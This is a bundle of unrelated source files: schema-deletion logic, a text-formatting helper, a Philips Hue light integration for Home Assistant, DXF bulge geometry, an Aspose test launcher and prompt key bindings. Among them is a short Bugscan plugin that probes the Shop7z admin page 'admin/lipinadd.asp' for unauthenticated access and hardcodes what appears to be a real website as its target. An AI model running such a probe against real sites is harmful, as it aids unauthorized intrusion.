ReferencedInheritingObjectCommand[ReferencedInheritingObjectT],
):
def _delete_ref(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.Object,
) -> s_schema.Schema:
scls = self.scls
referrer_class = type(referrer)
mcls = type(scls)
refdict = referrer_class.get_refdict_for_class(mcls)
reftype = referrer_class.get_field(refdict.attr).type
refname = reftype.get_key_for(schema, self.scls)
self_name = self.scls.get_name(schema)
schema = referrer.del_classref(schema, refdict.attr, refname)
if (isinstance(referrer, so.InheritingObject)
and not context.canonical):
if (not context.in_deletion(offset=1)
and not context.disable_dep_verification):
implicit_bases = set(self._get_implicit_ref_bases(
schema, context, referrer, refdict.attr, self_name))
deleted_bases = set()
for ctx in context.stack:
if isinstance(ctx.op, type(self)):
deleted_bases.add(ctx.op.scls)
implicit_bases -= deleted_bases
if implicit_bases:
# Cannot remove inherited objects.
vn = scls.get_verbosename(schema, with_parent=True)
parents = [
b.get_field_value(schema, refdict.backref_attr)
for b in implicit_bases
]
pnames = '\n- '.join(
p.get_verbosename(schema, with_parent=True)
for p in parents
)
raise errors.SchemaError(
f'cannot drop inherited {vn}',
context=self.source_context,
details=f'{vn} is inherited from:\n- {pnames}'
)
alter_cmd = sd.ObjectCommandMeta.get_command_class_or_die(
sd.AlterObject, referrer_class)
for child in referrer.children(schema):
assert isinstance(child, so.QualifiedObject)
child_coll = child.get_field_value(schema, refdict.attr)
fq_refname_in_child = self._classname_from_name(
self_name,
child.get_name(schema),
)
child_refname = reftype.get_key_for_name(
schema, fq_refname_in_child)
existing = child_coll.get(schema, child_refname, None)
if existing is not None:
alter = alter_cmd(classname=child.get_name(schema))
with alter.new_context(schema, context, child):
schema, cmd = self._propagate_ref_deletion(
schema, context, refdict, child, existing)
alter.add(cmd)
self.add(alter)
return schema
def _propagate_ref_deletion(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
refdict: so.RefDict,
child: so.InheritingObject,
child_ref: ReferencedInheritingObjectT,
) -> Tuple[s_schema.Schema, sd.Command]:
get_cmd = sd.ObjectCommandMeta.get_command_class_or_die
mcls = type(self.scls)
name = child_ref.get_name(schema)
implicit_bases = self._get_implicit_ref_bases(
schema, context, child, refdict.attr, name)
cmd: sd.Command
if child_ref.get_is_local(schema) or implicit_bases:
# Child is either defined locally or is inherited
# from another parent, so we need to do a rebase.
removed_bases, added_bases = self.get_ref_implicit_base_delta(
schema, context, child_ref, implicit_bases)
rebase_cmd_cls = get_cmd(inheriting.RebaseInheritingObject, mcls)
rebase_cmd = rebase_cmd_cls(
classname=name,
added_bases=added_bases,
removed_bases=removed_bases,
)
ref_alter_cmd = get_cmd(sd.AlterObject, mcls)
cmd = ref_alter_cmd(classname=name)
cmd.add(rebase_cmd)
else:
# The ref in child should no longer exist.
ref_del_cmd = get_cmd(sd.DeleteObject, mcls)
cmd = ref_del_cmd(classname=name)
schema = cmd.apply(schema, context)
return schema, cmd
| 1.679688 | 2 |
tools.py | Jakuko99/effectb | 1 | 3460 | from calendar import month_name
class Tools:
def __init__(self):
self.output = ""
def formatDate(self, date):
elements = date.split("-")
return f"{elements[2]}. {month_name[int(elements[1])]} {elements[0]}"
def shortenText(self, string, n): #return first n sentences from string
first = string.find(".")
for _ in range(n - 1):
if not string.find(".", first + 1) == -1:
first = string.find(".", first + 1)
return f"{string[:first-len(string)]}."
def tupleUnpack(self, tup):
self.output = ""
for item in tup:
self.output += f"{item} "
return self.output[:-1]
def joinList(self, list):
self.output = ""
for item in list:
self.output += f"{item}, "
return self.output[:-2] #remove last ', '
def partialJoin(self, list, n):
self.output = ""
i = 0
for item in list:
self.output += f"{item}, "
i += 1
if i >= n:
break
return self.output[:-2]
def processFilmography(self, list, n):
self.output = ""
i = 0
for item in list:
if 'year' in item:
self.output += f"{item['title']} ({item['year']}), "
else:
self.output += f"{item['title'].replace(' ()', '')}, "
i += 1
if i >= n:
break
return self.output[:-2]
def convertTime(self, runtime):
time = int(runtime)
mins = time % 60
hours = int(time / 60)
if hours >= 1:
return f"{hours} h {mins} min"
else:
return f"{mins} min" | 3.34375 | 3 |
Bugscan_exploits-master/exp_list/exp-2307.py | csadsl/poc_exp | 11 | 3461 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = 烽火戏诸侯
#_PlugName_ = Shop7z /admin/lipinadd.asp unauthorized access
import re
def assign(service, arg):
if service == "shop7z":
return True, arg
def audit(arg):
payload = 'admin/lipinadd.asp'
target = arg + payload
    code, head, res, errcode, _ = curl.curl2(target)
if code == 200 and 'name="lipinname"' in res and 'name="showflag"' in res:
security_hole(target)
if __name__ == '__main__':
from dummy import *
audit(assign('shop7z', 'http://www.99ysbjw.com/')[1]) | 2.09375 | 2 |
homeassistant/components/hue/light.py | dlangerm/core | 5 | 3462 | """Support for the Philips Hue lights."""
from __future__ import annotations
from datetime import timedelta
from functools import partial
import logging
import random
import aiohue
import async_timeout
from homeassistant.components.light import (
ATTR_BRIGHTNESS,
ATTR_COLOR_TEMP,
ATTR_EFFECT,
ATTR_FLASH,
ATTR_HS_COLOR,
ATTR_TRANSITION,
EFFECT_COLORLOOP,
EFFECT_RANDOM,
FLASH_LONG,
FLASH_SHORT,
SUPPORT_BRIGHTNESS,
SUPPORT_COLOR,
SUPPORT_COLOR_TEMP,
SUPPORT_EFFECT,
SUPPORT_FLASH,
SUPPORT_TRANSITION,
LightEntity,
)
from homeassistant.core import callback
from homeassistant.exceptions import PlatformNotReady
from homeassistant.helpers.debounce import Debouncer
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.update_coordinator import (
CoordinatorEntity,
DataUpdateCoordinator,
UpdateFailed,
)
from homeassistant.util import color
from .const import (
DOMAIN as HUE_DOMAIN,
GROUP_TYPE_LIGHT_GROUP,
GROUP_TYPE_LIGHT_SOURCE,
GROUP_TYPE_LUMINAIRE,
GROUP_TYPE_ROOM,
REQUEST_REFRESH_DELAY,
)
from .helpers import remove_devices
SCAN_INTERVAL = timedelta(seconds=5)
_LOGGER = logging.getLogger(__name__)
SUPPORT_HUE_ON_OFF = SUPPORT_FLASH | SUPPORT_TRANSITION
SUPPORT_HUE_DIMMABLE = SUPPORT_HUE_ON_OFF | SUPPORT_BRIGHTNESS
SUPPORT_HUE_COLOR_TEMP = SUPPORT_HUE_DIMMABLE | SUPPORT_COLOR_TEMP
SUPPORT_HUE_COLOR = SUPPORT_HUE_DIMMABLE | SUPPORT_EFFECT | SUPPORT_COLOR
SUPPORT_HUE_EXTENDED = SUPPORT_HUE_COLOR_TEMP | SUPPORT_HUE_COLOR
SUPPORT_HUE = {
"Extended color light": SUPPORT_HUE_EXTENDED,
"Color light": SUPPORT_HUE_COLOR,
"Dimmable light": SUPPORT_HUE_DIMMABLE,
"On/Off plug-in unit": SUPPORT_HUE_ON_OFF,
"Color temperature light": SUPPORT_HUE_COLOR_TEMP,
}
ATTR_IS_HUE_GROUP = "is_hue_group"
GAMUT_TYPE_UNAVAILABLE = "None"
# Minimum Hue Bridge API version to support groups
# 1.4.0 introduced extended group info
# 1.12 introduced the state object for groups
# 1.13 introduced "any_on" to group state objects
GROUP_MIN_API_VERSION = (1, 13, 0)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Old way of setting up Hue lights.
Can only be called when a user accidentally mentions hue platform in their
config. But even in that case it would have been ignored.
"""
def create_light(item_class, coordinator, bridge, is_group, rooms, api, item_id):
"""Create the light."""
api_item = api[item_id]
if is_group:
supported_features = 0
for light_id in api_item.lights:
if light_id not in bridge.api.lights:
continue
light = bridge.api.lights[light_id]
supported_features |= SUPPORT_HUE.get(light.type, SUPPORT_HUE_EXTENDED)
supported_features = supported_features or SUPPORT_HUE_EXTENDED
else:
supported_features = SUPPORT_HUE.get(api_item.type, SUPPORT_HUE_EXTENDED)
return item_class(
coordinator, bridge, is_group, api_item, supported_features, rooms
)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the Hue lights from a config entry."""
bridge = hass.data[HUE_DOMAIN][config_entry.entry_id]
api_version = tuple(int(v) for v in bridge.api.config.apiversion.split("."))
rooms = {}
allow_groups = bridge.allow_groups
supports_groups = api_version >= GROUP_MIN_API_VERSION
if allow_groups and not supports_groups:
_LOGGER.warning("Please update your Hue bridge to support groups")
light_coordinator = DataUpdateCoordinator(
hass,
_LOGGER,
name="light",
update_method=partial(async_safe_fetch, bridge, bridge.api.lights.update),
update_interval=SCAN_INTERVAL,
request_refresh_debouncer=Debouncer(
bridge.hass, _LOGGER, cooldown=REQUEST_REFRESH_DELAY, immediate=True
),
)
# First do a refresh to see if we can reach the hub.
# Otherwise we will declare not ready.
await light_coordinator.async_refresh()
if not light_coordinator.last_update_success:
raise PlatformNotReady
if not supports_groups:
update_lights_without_group_support = partial(
async_update_items,
bridge,
bridge.api.lights,
{},
async_add_entities,
partial(create_light, HueLight, light_coordinator, bridge, False, rooms),
None,
)
# We add a listener after fetching the data, so manually trigger listener
bridge.reset_jobs.append(
light_coordinator.async_add_listener(update_lights_without_group_support)
)
return
group_coordinator = DataUpdateCoordinator(
hass,
_LOGGER,
name="group",
update_method=partial(async_safe_fetch, bridge, bridge.api.groups.update),
update_interval=SCAN_INTERVAL,
request_refresh_debouncer=Debouncer(
bridge.hass, _LOGGER, cooldown=REQUEST_REFRESH_DELAY, immediate=True
),
)
if allow_groups:
update_groups = partial(
async_update_items,
bridge,
bridge.api.groups,
{},
async_add_entities,
partial(create_light, HueLight, group_coordinator, bridge, True, None),
None,
)
bridge.reset_jobs.append(group_coordinator.async_add_listener(update_groups))
cancel_update_rooms_listener = None
@callback
def _async_update_rooms():
"""Update rooms."""
nonlocal cancel_update_rooms_listener
rooms.clear()
for item_id in bridge.api.groups:
group = bridge.api.groups[item_id]
if group.type != GROUP_TYPE_ROOM:
continue
for light_id in group.lights:
rooms[light_id] = group.name
# Once we do a rooms update, we cancel the listener
# until the next time lights are added
bridge.reset_jobs.remove(cancel_update_rooms_listener)
cancel_update_rooms_listener() # pylint: disable=not-callable
cancel_update_rooms_listener = None
@callback
def _setup_rooms_listener():
nonlocal cancel_update_rooms_listener
if cancel_update_rooms_listener is not None:
# If there are new lights added before _async_update_rooms
# is called we should not add another listener
return
cancel_update_rooms_listener = group_coordinator.async_add_listener(
_async_update_rooms
)
bridge.reset_jobs.append(cancel_update_rooms_listener)
_setup_rooms_listener()
await group_coordinator.async_refresh()
update_lights_with_group_support = partial(
async_update_items,
bridge,
bridge.api.lights,
{},
async_add_entities,
partial(create_light, HueLight, light_coordinator, bridge, False, rooms),
_setup_rooms_listener,
)
# We add a listener after fetching the data, so manually trigger listener
bridge.reset_jobs.append(
light_coordinator.async_add_listener(update_lights_with_group_support)
)
update_lights_with_group_support()
async def async_safe_fetch(bridge, fetch_method):
"""Safely fetch data."""
try:
with async_timeout.timeout(4):
return await bridge.async_request_call(fetch_method)
except aiohue.Unauthorized as err:
await bridge.handle_unauthorized_error()
raise UpdateFailed("Unauthorized") from err
except aiohue.AiohueException as err:
raise UpdateFailed(f"Hue error: {err}") from err
@callback
def async_update_items(
bridge, api, current, async_add_entities, create_item, new_items_callback
):
"""Update items."""
new_items = []
for item_id in api:
if item_id in current:
continue
current[item_id] = create_item(api, item_id)
new_items.append(current[item_id])
bridge.hass.async_create_task(remove_devices(bridge, api, current))
if new_items:
# This is currently used to setup the listener to update rooms
if new_items_callback:
new_items_callback()
async_add_entities(new_items)
def hue_brightness_to_hass(value):
"""Convert hue brightness 1..254 to hass format 0..255."""
return min(255, round((value / 254) * 255))
def hass_to_hue_brightness(value):
"""Convert hass brightness 0..255 to hue 1..254 scale."""
return max(1, round((value / 255) * 254))
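# A minimal sketch of how the two conversions above behave at the endpoints of
# their scales (hand-checked values, not Home Assistant test fixtures):
#   hue_brightness_to_hass(254) -> 255, hue_brightness_to_hass(1) -> 1
#   hass_to_hue_brightness(255) -> 254, hass_to_hue_brightness(0) -> 1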
class HueLight(CoordinatorEntity, LightEntity):
"""Representation of a Hue light."""
def __init__(self, coordinator, bridge, is_group, light, supported_features, rooms):
"""Initialize the light."""
super().__init__(coordinator)
self.light = light
self.bridge = bridge
self.is_group = is_group
self._supported_features = supported_features
self._rooms = rooms
if is_group:
self.is_osram = False
self.is_philips = False
self.is_innr = False
self.is_ewelink = False
self.is_livarno = False
self.gamut_typ = GAMUT_TYPE_UNAVAILABLE
self.gamut = None
else:
self.is_osram = light.manufacturername == "OSRAM"
self.is_philips = light.manufacturername == "Philips"
self.is_innr = light.manufacturername == "innr"
self.is_ewelink = light.manufacturername == "eWeLink"
self.is_livarno = light.manufacturername.startswith("_TZ3000_")
self.gamut_typ = self.light.colorgamuttype
self.gamut = self.light.colorgamut
_LOGGER.debug("Color gamut of %s: %s", self.name, str(self.gamut))
if self.light.swupdatestate == "readytoinstall":
err = (
"Please check for software updates of the %s "
"bulb in the Philips Hue App."
)
_LOGGER.warning(err, self.name)
if self.gamut and not color.check_valid_gamut(self.gamut):
err = "Color gamut of %s: %s, not valid, setting gamut to None."
_LOGGER.debug(err, self.name, str(self.gamut))
self.gamut_typ = GAMUT_TYPE_UNAVAILABLE
self.gamut = None
@property
def unique_id(self):
"""Return the unique ID of this Hue light."""
unique_id = self.light.uniqueid
if not unique_id and self.is_group and self.light.room:
unique_id = self.light.room["id"]
return unique_id
@property
def device_id(self):
"""Return the ID of this Hue light."""
return self.unique_id
@property
def name(self):
"""Return the name of the Hue light."""
return self.light.name
@property
def brightness(self):
"""Return the brightness of this light between 0..255."""
if self.is_group:
bri = self.light.action.get("bri")
else:
bri = self.light.state.get("bri")
if bri is None:
return bri
return hue_brightness_to_hass(bri)
@property
def _color_mode(self):
"""Return the hue color mode."""
if self.is_group:
return self.light.action.get("colormode")
return self.light.state.get("colormode")
@property
def hs_color(self):
"""Return the hs color value."""
mode = self._color_mode
source = self.light.action if self.is_group else self.light.state
if mode in ("xy", "hs") and "xy" in source:
return color.color_xy_to_hs(*source["xy"], self.gamut)
return None
@property
def color_temp(self):
"""Return the CT color value."""
# Don't return color temperature unless in color temperature mode
if self._color_mode != "ct":
return None
if self.is_group:
return self.light.action.get("ct")
return self.light.state.get("ct")
@property
def min_mireds(self):
"""Return the coldest color_temp that this light supports."""
if self.is_group:
return super().min_mireds
min_mireds = self.light.controlcapabilities.get("ct", {}).get("min")
        # We filter out '0' too, which can be incorrectly reported by 3rd party bulbs
if not min_mireds:
return super().min_mireds
return min_mireds
@property
def max_mireds(self):
"""Return the warmest color_temp that this light supports."""
if self.is_group:
return super().max_mireds
if self.is_livarno:
return 500
max_mireds = self.light.controlcapabilities.get("ct", {}).get("max")
if not max_mireds:
return super().max_mireds
return max_mireds
@property
def is_on(self):
"""Return true if device is on."""
if self.is_group:
return self.light.state["any_on"]
return self.light.state["on"]
@property
def available(self):
"""Return if light is available."""
return self.coordinator.last_update_success and (
self.is_group
or self.bridge.allow_unreachable
or self.light.state["reachable"]
)
@property
def supported_features(self):
"""Flag supported features."""
return self._supported_features
@property
def effect(self):
"""Return the current effect."""
return self.light.state.get("effect", None)
@property
def effect_list(self):
"""Return the list of supported effects."""
if self.is_osram:
return [EFFECT_RANDOM]
return [EFFECT_COLORLOOP, EFFECT_RANDOM]
@property
def device_info(self) -> DeviceInfo | None:
"""Return the device info."""
if self.light.type in (
GROUP_TYPE_LIGHT_GROUP,
GROUP_TYPE_ROOM,
GROUP_TYPE_LUMINAIRE,
GROUP_TYPE_LIGHT_SOURCE,
):
return None
suggested_area = None
if self.light.id in self._rooms:
suggested_area = self._rooms[self.light.id]
return DeviceInfo(
identifiers={(HUE_DOMAIN, self.device_id)},
manufacturer=self.light.manufacturername,
# productname added in Hue Bridge API 1.24
# (published 03/05/2018)
model=self.light.productname or self.light.modelid,
name=self.name,
# Not yet exposed as properties in aiohue
suggested_area=suggested_area,
sw_version=self.light.raw["swversion"],
via_device=(HUE_DOMAIN, self.bridge.api.config.bridgeid),
)
async def async_added_to_hass(self) -> None:
"""Handle entity being added to Home Assistant."""
self.async_on_remove(
self.bridge.listen_updates(
self.light.ITEM_TYPE, self.light.id, self.async_write_ha_state
)
)
await super().async_added_to_hass()
async def async_turn_on(self, **kwargs):
"""Turn the specified or all lights on."""
command = {"on": True}
if ATTR_TRANSITION in kwargs:
command["transitiontime"] = int(kwargs[ATTR_TRANSITION] * 10)
if ATTR_HS_COLOR in kwargs:
if self.is_osram:
command["hue"] = int(kwargs[ATTR_HS_COLOR][0] / 360 * 65535)
command["sat"] = int(kwargs[ATTR_HS_COLOR][1] / 100 * 255)
else:
# Philips hue bulb models respond differently to hue/sat
# requests, so we convert to XY first to ensure a consistent
# color.
xy_color = color.color_hs_to_xy(*kwargs[ATTR_HS_COLOR], self.gamut)
command["xy"] = xy_color
elif ATTR_COLOR_TEMP in kwargs:
temp = kwargs[ATTR_COLOR_TEMP]
command["ct"] = max(self.min_mireds, min(temp, self.max_mireds))
if ATTR_BRIGHTNESS in kwargs:
command["bri"] = hass_to_hue_brightness(kwargs[ATTR_BRIGHTNESS])
flash = kwargs.get(ATTR_FLASH)
if flash == FLASH_LONG:
command["alert"] = "lselect"
del command["on"]
elif flash == FLASH_SHORT:
command["alert"] = "select"
del command["on"]
elif not self.is_innr and not self.is_ewelink and not self.is_livarno:
command["alert"] = "none"
if ATTR_EFFECT in kwargs:
effect = kwargs[ATTR_EFFECT]
if effect == EFFECT_COLORLOOP:
command["effect"] = "colorloop"
elif effect == EFFECT_RANDOM:
command["hue"] = random.randrange(0, 65535)
command["sat"] = random.randrange(150, 254)
else:
command["effect"] = "none"
if self.is_group:
await self.bridge.async_request_call(
partial(self.light.set_action, **command)
)
else:
await self.bridge.async_request_call(
partial(self.light.set_state, **command)
)
await self.coordinator.async_request_refresh()
async def async_turn_off(self, **kwargs):
"""Turn the specified or all lights off."""
command = {"on": False}
if ATTR_TRANSITION in kwargs:
command["transitiontime"] = int(kwargs[ATTR_TRANSITION] * 10)
flash = kwargs.get(ATTR_FLASH)
if flash == FLASH_LONG:
command["alert"] = "lselect"
del command["on"]
elif flash == FLASH_SHORT:
command["alert"] = "select"
del command["on"]
elif not self.is_innr and not self.is_livarno:
command["alert"] = "none"
if self.is_group:
await self.bridge.async_request_call(
partial(self.light.set_action, **command)
)
else:
await self.bridge.async_request_call(
partial(self.light.set_state, **command)
)
await self.coordinator.async_request_refresh()
@property
def extra_state_attributes(self):
"""Return the device state attributes."""
if not self.is_group:
return {}
return {ATTR_IS_HUE_GROUP: self.is_group}
| 2.125 | 2 |
src/ezdxf/math/bulge.py | dmtvanzanten/ezdxf | 0 | 3463 | <gh_stars>0
# Copyright (c) 2018-2021 <NAME>
# License: MIT License
# source: http://www.lee-mac.com/bulgeconversion.html
# source: http://www.afralisp.net/archive/lisp/Bulges1.htm
from typing import Any, TYPE_CHECKING, Tuple
import math
from ezdxf.math import Vec2
if TYPE_CHECKING:
from ezdxf.eztypes import Vertex
__all__ = [
"bulge_to_arc", "bulge_3_points", "bulge_center", "bulge_radius",
"arc_to_bulge"
]
def polar(p: Any, angle: float, distance: float) -> Vec2:
""" Returns the point at a specified `angle` and `distance` from point `p`.
Args:
p: point as :class:`Vec2` compatible object
angle: angle in radians
distance: distance
"""
return Vec2(p) + Vec2.from_angle(angle, distance)
def angle(p1: Any, p2: Any) -> float:
""" Returns angle a line defined by two endpoints and x-axis in radians.
Args:
p1: start point as :class:`Vec2` compatible object
p2: end point as :class:`Vec2` compatible object
"""
return (Vec2(p2) - Vec2(p1)).angle
def arc_to_bulge(center: 'Vertex', start_angle: float, end_angle: float,
radius: float) -> Tuple['Vec2', 'Vec2', float]:
"""
Returns bulge parameters from arc parameters.
Args:
center: circle center point as :class:`Vec2` compatible object
start_angle: start angle in radians
end_angle: end angle in radians
radius: circle radius
Returns:
tuple: (start_point, end_point, bulge)
"""
start_point = polar(center, start_angle, radius)
end_point = polar(center, end_angle, radius)
pi2 = math.pi * 2
a = math.fmod((pi2 + (end_angle - start_angle)), pi2) / 4.
bulge = math.sin(a) / math.cos(a)
return start_point, end_point, bulge
def bulge_3_points(start_point: 'Vertex', end_point: 'Vertex',
point: 'Vertex') -> float:
""" Returns bulge value defined by three points.
Based on 3-Points to Bulge by `Lee Mac`_.
Args:
start_point: start point as :class:`Vec2` compatible object
end_point: end point as :class:`Vec2` compatible object
point: arbitrary point as :class:`Vec2` compatible object
"""
a = (math.pi - angle(point, start_point) + angle(point, end_point)) / 2
return math.sin(a) / math.cos(a)
def bulge_to_arc(start_point: 'Vertex',
end_point: 'Vertex',
bulge: float) -> Tuple['Vec2', float, float, float]:
""" Returns arc parameters from bulge parameters.
The arcs defined by bulge values of :class:`~ezdxf.entities.LWPolyline`
and 2D :class:`~ezdxf.entities.Polyline` entities start at the vertex which
    includes the bulge value and end at the following vertex.
Based on Bulge to Arc by `Lee Mac`_.
Args:
start_point: start vertex as :class:`Vec2` compatible object
end_point: end vertex as :class:`Vec2` compatible object
bulge: bulge value
Returns:
Tuple: (center, start_angle, end_angle, radius)
"""
r = signed_bulge_radius(start_point, end_point, bulge)
a = angle(start_point, end_point) + (math.pi / 2 - math.atan(bulge) * 2)
c = polar(start_point, a, r)
if bulge < 0:
return c, angle(c, end_point), angle(c, start_point), abs(r)
else:
return c, angle(c, start_point), angle(c, end_point), abs(r)
def bulge_center(start_point: 'Vertex', end_point: 'Vertex',
bulge: float) -> 'Vec2':
""" Returns center of arc described by the given bulge parameters.
    Based on Bulge Center by `Lee Mac`_.
Args:
start_point: start point as :class:`Vec2` compatible object
end_point: end point as :class:`Vec2` compatible object
bulge: bulge value as float
"""
start_point = Vec2(start_point)
a = angle(start_point, end_point) + (math.pi / 2. - math.atan(bulge) * 2.)
return start_point + Vec2.from_angle(a, signed_bulge_radius(start_point,
end_point,
bulge))
def signed_bulge_radius(start_point: 'Vertex', end_point: 'Vertex',
bulge: float) -> float:
return Vec2(start_point).distance(Vec2(end_point)) * (
1. + (bulge * bulge)) / 4. / bulge
def bulge_radius(start_point: 'Vertex', end_point: 'Vertex',
bulge: float) -> float:
""" Returns radius of arc defined by the given bulge parameters.
    Based on Bulge Radius by `Lee Mac`_
Args:
start_point: start point as :class:`Vec2` compatible object
end_point: end point as :class:`Vec2` compatible object
bulge: bulge value
"""
return abs(signed_bulge_radius(start_point, end_point, bulge))
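# A small hand-checked demo (not part of the original module), guarded so it
# only runs when this file is executed directly; values are approximate.
if __name__ == "__main__":
    # Quarter circle of radius 1 centred at the origin: bulge == tan(pi/8).
    sp, ep, b = arc_to_bulge((0, 0), 0, math.pi / 2, 1)
    print(sp, ep, b)                # start ~ (1, 0), end ~ (0, 1), bulge ~ 0.41421
    print(bulge_to_arc(sp, ep, b))  # center ~ (0, 0), angles 0 and ~pi/2, radius ~ 1.0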
| 2.984375 | 3 |
Plugins/Aspose.Email Java for Python/tests/ProgrammingEmail/ManageAttachments/ManageAttachments.py | aspose-email/Aspose.Email-for-Java | 24 | 3464 | <gh_stars>10-100
# To change this license header, choose License Headers in Project Properties.
# To change this template file, choose Tools | Templates
# and open the template in the editor.
#if __name__ == "__main__":
# print "Hello World"
from ProgrammingEmail import ManageAttachments
import jpype
import os.path
asposeapispath = os.path.join(os.path.abspath("./../../../"), "lib/")
dataDir = os.path.join(os.path.abspath("./"), "data/")
print "You need to put your Aspose.Email for Java APIs .jars in this folder:\n"+asposeapispath
#print dataDir
jpype.startJVM(jpype.getDefaultJVMPath(), "-Djava.ext.dirs=%s" % asposeapispath)
hw = ManageAttachments(dataDir)
hw.main() | 1.820313 | 2 |
mypython/keys.py | asmeurer/mypython | 27 | 3465 | from prompt_toolkit.key_binding.bindings.named_commands import (accept_line,
self_insert, backward_delete_char, beginning_of_line)
from prompt_toolkit.key_binding.bindings.basic import if_no_repeat
from prompt_toolkit.key_binding.bindings.basic import load_basic_bindings
from prompt_toolkit.key_binding.bindings.emacs import load_emacs_bindings, load_emacs_search_bindings
from prompt_toolkit.key_binding.bindings.mouse import load_mouse_bindings
from prompt_toolkit.key_binding.bindings.cpr import load_cpr_bindings
from prompt_toolkit.key_binding.bindings.page_navigation import load_emacs_page_navigation_bindings
from prompt_toolkit.key_binding import KeyBindings, merge_key_bindings
from prompt_toolkit.keys import Keys, ALL_KEYS
from prompt_toolkit.filters import Condition, HasSelection, is_searching
from prompt_toolkit.selection import SelectionState
from prompt_toolkit.clipboard import ClipboardData
from prompt_toolkit.input.vt100_parser import ANSI_SEQUENCES
from prompt_toolkit.application.current import get_app
from prompt_toolkit.application import run_in_terminal
from prompt_toolkit import __version__ as prompt_toolkit_version
from .multiline import (auto_newline, tab_should_insert_whitespace,
document_is_multiline_python)
from .tokenize import inside_string, matching_parens
from .theme import emoji, emoji_pudb
from .processors import get_pyflakes_warnings
import re
import subprocess
import sys
import textwrap
import platform
def get_key_bindings():
# Based on prompt_toolkit.key_binding.defaults.load_key_bindings()
return merge_key_bindings([
load_basic_bindings(),
load_emacs_bindings(),
load_emacs_search_bindings(),
load_emacs_page_navigation_bindings(),
load_mouse_bindings(),
load_cpr_bindings(),
custom_key_bindings,
])
r = custom_key_bindings = KeyBindings()
def warning_positions(event):
document = event.current_buffer.document
warnings = get_pyflakes_warnings(document.text, frozenset(event.current_buffer.session._locals))
positions = []
for (row, col, msg, m) in warnings:
# Handle SyntaxErrorMessage which is the same warning for the whole
# line.
if m.col != col:
continue
pos = document.translate_row_col_to_index(row, col)
positions.append(pos)
return positions
@r.add_binding(Keys.Escape, 'p')
def previous_warning(event):
positions = warning_positions(event)
buffer = event.current_buffer
buffer._show_syntax_warning = True
if not positions or positions[0] >= buffer.cursor_position:
return
p = positions[0]
for pos in positions:
if pos >= buffer.cursor_position:
break
p = pos
event.current_buffer._show_syntax_warning = True
event.current_buffer.cursor_position = p
@r.add_binding(Keys.Escape, 'n')
def next_warning(event):
positions = warning_positions(event)
buffer = event.current_buffer
buffer._show_syntax_warning = True
if not positions or positions[-1] <= buffer.cursor_position:
return
p = positions[-1]
for pos in reversed(positions):
if pos <= buffer.cursor_position:
break
p = pos
event.current_buffer.cursor_position = p
# This can be removed once
# https://github.com/prompt-toolkit/python-prompt-toolkit/pull/857 is in a
# released version of prompt-toolkit.
ANSI_SEQUENCES['\x1b[1;9A'] = (Keys.Escape, Keys.Up)
ANSI_SEQUENCES['\x1b[1;9B'] = (Keys.Escape, Keys.Down)
@r.add_binding(Keys.Escape, Keys.Up)
def previous_history_search(event):
event.key_sequence[-1].accept_next = True
buffer = event.current_buffer
buffer.history_backward(count=event.arg, history_search=True)
@r.add_binding(Keys.Escape, 'P')
@r.add_binding(Keys.Escape, Keys.Down)
def forward_history_search(event):
event.key_sequence[-1].accept_next = True
buffer = event.current_buffer
buffer.history_forward(count=event.arg, history_search=True)
@r.add_binding(Keys.Escape, '<')
def beginning(event):
"""
Move to the beginning
"""
event.current_buffer.cursor_position = 0
@r.add_binding(Keys.Escape, '>')
def end(event):
"""
Move to the end
"""
event.current_buffer.cursor_position = len(event.current_buffer.text)
# Document.start_of_paragraph/end_of_paragraph don't treat multiple blank
# lines correctly.
# Gives the positions right before one or more blank lines
BLANK_LINES = re.compile(r'\S *(\n *\n)')
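# For example (a hand-checked sketch, not from the original file):
#   [m.start(1) for m in BLANK_LINES.finditer("a\n\nb\n\nc")] -> [1, 4]
# i.e. each match group starts at the newline that ends the preceding non-blank line.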
@r.add_binding(Keys.Escape, '}')
def forward_paragraph(event):
"""
Move forward one paragraph of text
"""
text = event.current_buffer.text
cursor_position = event.current_buffer.cursor_position
for m in BLANK_LINES.finditer(text):
if m.start(0) > cursor_position:
event.current_buffer.cursor_position = m.start(1)+1
return
event.current_buffer.cursor_position = len(text)
@r.add_binding(Keys.Escape, '{')
def backward_paragraph(event):
"""
Move back one paragraph of text
"""
text = event.current_buffer.text
cursor_position = event.current_buffer.cursor_position
for m in BLANK_LINES.finditer(text[::-1]):
if m.start(0) > len(text) - cursor_position:
event.current_buffer.cursor_position = len(text) - m.end(1) + 1
return
event.current_buffer.cursor_position = 0
WORD = re.compile(r'([a-z0-9]+|[A-Z]{2,}|[a-zA-Z0-9][a-z0-9]*)')
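# The pattern is camelCase/acronym aware; for example (hand-checked, not part of
# the original file):
#   WORD.findall("fooBarBAZ") -> ['foo', 'Bar', 'BAZ']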
@r.add_binding(Keys.Escape, 'f')
@r.add_binding(Keys.Escape, Keys.Right)
def forward_word(event):
text = event.current_buffer.text
cursor_position = event.current_buffer.cursor_position
for m in WORD.finditer(text):
if m.end(0) > cursor_position:
event.current_buffer.cursor_position = m.end(0)
return
event.current_buffer.cursor_position = len(text)
@r.add_binding(Keys.Escape, 'b')
@r.add_binding(Keys.Escape, Keys.Left)
def backward_word(event):
"""
Move back one paragraph of text
"""
text = event.current_buffer.text
cursor_position = event.current_buffer.cursor_position
for m in reversed(list(WORD.finditer(text))):
if m.start(0) < cursor_position:
event.current_buffer.cursor_position = m.start(0)
return
event.current_buffer.cursor_position = 0
@r.add_binding(Keys.Escape, 'd')
def kill_word(event):
buffer = event.current_buffer
text = buffer.text
cursor_position = buffer.cursor_position
pos = None
for m in WORD.finditer(text):
if m.end(0) > cursor_position:
pos = m.end(0) - cursor_position
break
if pos:
deleted = buffer.delete(count=pos)
event.app.clipboard.set_text(deleted)
@r.add_binding(Keys.Escape, Keys.Backspace)
def backward_kill_word(event):
buffer = event.current_buffer
text = buffer.text
cursor_position = buffer.cursor_position
for m in reversed(list(WORD.finditer(text))):
if m.start(0) < cursor_position:
pos = cursor_position - m.start(0)
break
else:
pos = buffer.cursor_position
if pos:
deleted = buffer.delete_before_cursor(count=pos)
event.app.clipboard.set_text(deleted)
def insert_text_ovewrite(buffer, data, move_cursor=True):
"""
    Insert characters at the cursor position, overwriting existing text.
    :param move_cursor: Advance the cursor past the inserted text when True.
"""
